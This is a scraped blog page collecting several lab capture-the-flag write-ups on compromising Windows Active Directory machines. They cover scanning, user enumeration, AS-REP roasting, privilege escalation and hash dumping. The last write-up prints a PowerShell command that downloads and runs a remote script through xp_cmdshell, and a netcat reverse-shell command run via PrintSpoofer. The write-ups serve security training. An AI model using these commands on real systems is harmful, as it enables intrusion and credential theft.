Scanning
We run nmap on ports with scripts and software versions and enumerate subdomains streamIO.htb and watch.streamIO.htb:
Enumeration
We access to port 80 and found an Microsoft IIS server.
Mostrando entradas con la etiqueta active-directory. Mostrar todas las entradas
Mostrando entradas con la etiqueta active-directory. Mostrar todas las entradas
sábado, 17 de septiembre de 2022
domingo, 20 de junio de 2021
Scanning
We launch nmap a bit "aggressive" (but we are in a controlled environment and we can afford it :P), to all ports and with verbosity to discover ports as nmap is getting them.
nmap with versions and scripts
Enumeration
We access the web service, find the corporate website and list some of the organization's users. This is great, as we could use them to brute force some exposed service.
We use the nikto tool, it discovers the directory "/backup/.
Accessing the directory, we find an office file containing the name and username of the employees.
Content ods file
We use the kerbrute tool to check which users exist, it quickly lists the user "lparker".
Exploitation
Once we have a user, we can check if the account is ASReproastable and consult its hash in the KDC.
We crack the hash with hashcat and rockyou dictionary, we will get the password in clear.
Read the first flag
We do a reconnaissance, we see that AV is enabled in the system and it prevents us from running some reconnaissance binaries.
Seeing that I can't find anything, I launch ldapsearch with the credentials and coincidentally, I find some flat credentials in the description of the user "jmurphy".
Credentials evidence
We use the credentials of the new user, read the user flag and see the privileges.... Oh wow! The privilege escalation looks good ;)
Privilege Escalation
We make use of the great tool evil-winrm and this article from HackPlayers. Actually the vulnerability allows to abuse the backup privilege to write and restore the modified ACLs as we wish.
We connect with our user and read the administrator flag.
Post-exploitation
Once we have gained access, it is time to obtain the hashes of the most relevant users.
NTLM HASHES
Commitment Active Directory
RDP connection
About
David Utón is Penetration Tester and security auditor for web and mobiles applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks.
Contacted on:
domingo, 30 de mayo de 2021
Scanning
We perform a quick and aggressive scan (not recommended in real environments) to detect open ports on the server.
Then, knowing the ports, we will launch an nmap with scripts and versions.
Enumeration
We test if we can authenticate with an anonymous user, we see that we cannot.
Another test that I usually do in real environments, is to test with the "guest" user, which is usually enabled by default. As you can see in the evidence, we can use it to get the users by their RID.
We create a list of the most relevant users obtained and brute force the "rockyou" dictionary. We will get some credentials.
Exploitation
After several tests in different services, we found that the credentials are functional in the "Microsoft SQL Server" service, from here we will be able to load a reverse shell.
xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString(\"http://10.11.30.149:8000/m3.ps1\")
Reverse shell connection
Privilege Escalation
We tried to read the user flag, but we do not have access. We check the user's privileges and see that we could escalate by impersonating the user "Administrator" using "SeImpersonatePrivilege".
We identify the exact version of Windows installed.
We download the PrintSpoofer exploit from this github, we also download netcat to the victim machine and run the following command putting a listening netcat on our Kali.
.\PrintSpoofer.exe -c "C:\users\SVC-Kerb.DC01\Videos\nc.exe 10.11.30.149 444 -e cmd"
Reverse shell as Administrator
And now we read the two flags.
User flag
Administrator flag
About
David Utón is Penetration Tester and security auditor for web and mobiles applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks.